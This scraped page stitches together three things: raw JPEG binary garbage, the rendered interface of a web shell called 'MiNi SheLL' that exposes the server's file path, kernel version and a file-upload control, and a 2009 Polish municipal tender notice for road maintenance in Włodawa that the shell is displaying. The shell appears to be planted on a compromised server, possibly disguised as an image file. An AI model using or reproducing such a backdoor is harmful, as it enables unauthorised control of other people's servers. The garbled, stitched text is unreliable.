JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090216/28450-N-2009.html

<p class="kh_header"><b>Włodawa: Bieżące utrzymanie dróg / ulic gminnych na terenie miasta Włodawy w 2009r.</b><br>
<b>Numer ogłoszenia: 28450 - 2009; data zamieszczenia: 16.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Włodawy , al. J. Piłsudskiego 41, 22-200 Włodawa, woj. lubelskie, tel. (082) 57 21 444, faks (082) 57 22 454.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.um.wlodawa.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Bieżące utrzymanie dróg / ulic gminnych na terenie miasta Włodawy w 2009r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje 3 zadania:

Zadanie nr 1 - Bieżące utrzymanie oznakowania poziomego na ulicach miejskich.
Zadanie nr 2 - Wykonanie remontów nawierzchni bitumicznych.
Zadanie nr 3 - Bieżące utrzymanie dróg gruntowych, o nawierzchniach żużlowych i tłuczniowych.
Szczegółowy opis przedmiotu zamówienia zawiera Specyfikacja Istotnych Warunków Zamówienia..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.53.31.40-2, 45.23.31.42-6, 45.23.32.00-1, 34.92.21.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium w wysokości 1500 zł  ( słownie: jeden tysiąc pięćset złotych 0 groszy.
8.1  F o r m y    w a d i u m 
1)  Wadium  może być wniesione w następujących formach:
     a) pieniądzu,
     b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej z tym, że  poręczenie kasy jest zawsze poręczeniem pieniężnym,
     c) gwarancjach bankowych ,   
     d) gwarancjach ubezpieczeniowych,   
     e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000r. O utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości  (Dz. U. Z 2007r, Nr 42,poz. 275).
8.2  Sposób i miejsce składania wadium
1) Wadium w formie pieniężnej należy wnieść przelewem na rachunek bankowy : K.B. S.A. O.Chełm Nr 06150013731213700176600000 , z adnotacją Wadium  - Bieżące utrzymanie dróg 2009r. Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się ono na rachunku bankowym Zamawiającego, o skuteczności nie decyduje data polecenia przelewu;
2) Oryginał wadium wnoszonego w innych formach należy złożyć w Sekretariacie Urzędu Miejskiego pokój nr 18, przed upływem terminu składania ofert.
3) Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny z imienia i nazwiska.
4) Z treści gwarancji winno wynikać bezwarunkowe, na pierwsze pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 4a i ust. 5 ustawy Pzp.
8.3  T e r m i n   s k ł a d a n i a    w a d i u m 
1)W a d i u m  musi być wniesione najpóźniej do wyznaczonego terminu składania ofert tj. do dnia 10.03.2009r. do godz. 10,00.
2)Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w podanym terminie znajdzie się na rachunku bankowym zamawiającego.
3)Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty ustawową formą wadium zostanie wykluczony z postępowania w trybie art. 24 ust. 2 pkt. 4 ustawy Pzp, a jego oferta zgodnie z art. 24 ust. 4 zostanie uznana za odrzuconą.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 5.1. O udzielenie zamówienie mogą ubiegać się wykonawcy, którzy potwierdzą spełnienie warunków wyznaczonych przez Zamawiającego, tj.:
5.1a. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 
5.1b. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
5.1c. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
5.1d. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art.24 ustawy Pzp..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 6.1 Wypełnione załączniki:
1)Formularz ofertowy z wykorzystaniem wzoru- Załącznik nr 1.
2)Formularze cenowe -  Załączniki 6, 7, 8.
3)Podpisaną umowę jako akceptację jej postanowień - Załącznik nr 2
4)Złożenie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz nie podleganiewykluczeniu w trybie art. 24 ustawy Pzp zgodnie ze wzorem- Załącznik nr 3 (spełnia warunek z pkt. 5.1d )
5)Dokumenty potwierdzające posiadanie uprawnień / pełnomocnictw osób podpisujących ofertę o ile  fakt ten nie wynika z przedstawionych dokumentów rejestrowych. Treść pełnomocnictwa powinna dokładnie określać zakres umocowania.
6.2. W celu potwierdzenia, że wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności wykonawca składa następujące oświadczenia i dokumenty, (spełnia warunek z pkt. 5.1a):
1)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej w zakresie objętym przedmiotem zamówienia, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 
2)złożenie oświadczenia, iż wykonawca nie zalega z uiszczaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, z wyjątkiem przypadku, kiedy została uzyskana zgoda przewidziana prawem na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu. Wzór dokumentu zawiera Załącznik nr 5 do SIWZ. 
6.3 W celu potwierdzenia, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia w postępowaniu o zamówienie publiczne składa następujące dokumenty: 
1) Wykaz robót budowlanych wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym stanowiącym przedmiot zamówienia. 
Warunek udziału w postępowaniu, określony w pkt. 5.1b zostanie spełniony, gdy wykonawca wykaże się co najmniej 1 robotą budowlaną polegającą na:
-  wykonywaniu robót wykończeniowych w tym oznakowania drogowego ulic na wartość co najmniej 10 .000 zł brutto liczoną łącznie dla wszystkich robót lub 1 roboty -  zadanie 1,
- wykonaniu robót w zakresie naprawy dróg w tym remoncie nawierzchni bitumicznych ulic na wartość co najmniej 30.000 zł brutto liczoną łącznie dla wszystkich robót lub 1 roboty - zadanie 2, 
- wykonaniu robót budowlano - drogowych, ziemnych nawierzchniowych o charakterze remontów nawierzchni gruntowych, żużlowych  bądź tłuczniowych dróg na wartość co najmniej 10.000 zł brutto liczoną łącznie dla wszystkich robót lub 1 roboty - zadanie  3.
Wykaz powinien być sporządzony zgodnie z Załącznikiem nr 4. 
Jeżeli  w  dokumentach   potwierdzających  wykonanie roboty/robót budowlanych nie ma podanych ich wartości, wykonawca powinien pisemnie oświadczyć, iż roboty te spełniły wymóg zamawiającego co do wymaganych wartości . 
2) Wykazanie się co najmniej 1 osobą, którą dysponuje lub będzie dysponował wykonawca i która będzie uczestniczyć w wykonywaniu zmówienia, posiadającą uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej i przynależnością do Okręgowej Izby Inżynierów Budownictwa  wraz z udokumentowaniem tych uprawnień. 
6.4. W celu potwierdzenia, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia w postępowaniu o zamówienie publiczne składa następujące dokumenty:
1)polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę co najmniej 50 000 zł.
2)Informacja banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w którym wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków  finansowych lub zdolność kredytową wykonawcy na kwotę nie mniejszą niż 50.000 zł brutto.
6.5. Wykonawca zamieszkały poza terytorium Rzeczypospolitej Polskiej w postępowaniu o   zamówienie publiczne składa następujące dokumenty:
1) Zamiast dokumentów, o których mowa w ust. 6.2. pkt. 1), 2) - składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę , potwierdzające odpowiednio, że: 
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) składa oświadczenie, iż nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
2) W zakresie informacji z art. 24 ust. 1 pkt 4-8 oraz ust. 1 pkt. 9 ustawy Pzp, składa oświadczenie o którym mowa w ust. 6.1. pkt 4 SIWZ, iż nie podlega wykluczeniu.
3) Dokumenty, o których mowa w ust. 6.5. pkt 1 a), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 
4) Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ust. 6.5. pkt 1 ), zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. 
6.6. Dokumenty wymagane w przypadku składania o f e r t y   w s p ó l n e j: 
1) Do Wykonawców ubiegających się wspólnie o udzielenie zamówienia ma zastosowanie art. 23 Prawa zamówień publicznych. Oferta powinna zawierać dokumenty potwierdzające wspólne spełnianie wymogów w zakresie posiadanego doświadczenia oraz potencjału ekonomicznego przez  podmioty składające ofertę.
Dokumenty wymienione w ust. 6.1 pkt.1, 2, 3, 5  oraz ust. 6.3. i 6.4. mogą zostać złożone wspólnie przez wykonawców tworzących konsorcjum. 
2) W przypadku oferty składanej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty wymienione w  ust. 6.1. pkt 4 oraz ust. 6.2 każdy z Wykonawców składa oddzielnie.
3)  Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich wykonawców występujących wspólnie.
4) W trybie art 141 ustawy Pzp Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie zobowiązań umowy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.um.wlodawa.pl..<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski  we Włodawie, Al.J. Piłsudskiego 41. 22-200 Włodawa..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.03.2009 godzina 10:00, miejsce: Urząd Miejski  we Włodawie, Al.J. Piłsudskiego 41. 22-200 Włodawa, sekretariat (pokój nr 18 ).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com